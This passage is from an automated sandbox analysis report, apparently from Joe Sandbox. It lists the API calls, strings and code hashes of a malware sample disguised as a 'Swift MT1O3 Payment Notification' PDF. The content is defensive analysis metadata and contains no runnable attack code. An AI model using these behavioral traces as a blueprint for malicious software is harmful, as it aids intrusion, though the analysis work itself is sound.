                                                                                                                              • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                              • GetFocus.USER32 ref: 0046157B
                                                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows
                                                                                                                              • String ID: %s%d
                                                                                                                              • API String ID: 3342072951-1110647743
                                                                                                                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                              • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                              • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                              • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                              • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                              APIs
                                                                                                                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArrayDataSafe$AccessFromStringUnaccess
                                                                                                                              • String ID: crts
                                                                                                                              • API String ID: 1361684037-3724388283
                                                                                                                              • Opcode ID: 0f4480408325e4c66bb123eb693080221c7fa426a15552de4fe70618470add7c
                                                                                                                              • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                              • Opcode Fuzzy Hash: 0f4480408325e4c66bb123eb693080221c7fa426a15552de4fe70618470add7c
                                                                                                                              • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$LabelVolume
                                                                                                                              • String ID: \VH
                                                                                                                              • API String ID: 2006950084-234962358
                                                                                                                              • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                              • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                              • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                              • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                              APIs
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                              • DrawMenuBar.USER32 ref: 00449761
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 3227129158-4108050209
                                                                                                                              • Opcode ID: 68396af68be8623511cc8a0f49243469e675682567c24635843af50f9040fda0
                                                                                                                              • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                              • Opcode Fuzzy Hash: 68396af68be8623511cc8a0f49243469e675682567c24635843af50f9040fda0
                                                                                                                              • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalEnterHandleIncrementInterlockedModuleSection
                                                                                                                              • String ID: KERNEL32.DLL$pI
                                                                                                                              • API String ID: 2650740867-197072765
                                                                                                                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                              • API String ID: 2574300362-3530519716
                                                                                                                              • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                              • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                              • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                              • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                              • API String ID: 2574300362-275556492
                                                                                                                              • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                              • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                              • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                              • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                              • API String ID: 2574300362-58917771
                                                                                                                              • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                              • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                              • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                              • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                              • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                              • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                              • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                              • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                                              • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                              • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                                                              • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                              • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                              • API String ID: 2574300362-199464113
                                                                                                                              • Opcode ID: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                                                                                                              • Instruction ID: 757376e69a8637ab8385673bd519a3d20b1bca35ee4978b7889da1ae4d413b5b
                                                                                                                              • Opcode Fuzzy Hash: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                                                                                                              • Instruction Fuzzy Hash: 4AE01271540706DFD7105F65D91964B77D8DF18762F104C2AFD85E2650D7B8E48087AC
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(mscoree.dll,?,0041168F,004115F6,?,0041823B,000000FF,0000001E,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D), ref: 00411661
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411671
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                              • API String ID: 1646373207-1276376045
                                                                                                                              • Opcode ID: e5967980360ca8e09bf433b7380d31dd14e74fd0abcf3be3ad432f86cd84717e
                                                                                                                              • Instruction ID: f36f60c497584aae845ab64661926f25b8865bc4f9074f5e21fa0bd8eb1b54f8
                                                                                                                              • Opcode Fuzzy Hash: e5967980360ca8e09bf433b7380d31dd14e74fd0abcf3be3ad432f86cd84717e
                                                                                                                              • Instruction Fuzzy Hash: 63D0C9302803056B9B286FB29E09B5F3A5CAE80F90319082ABA08D1160DAAAD851866D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
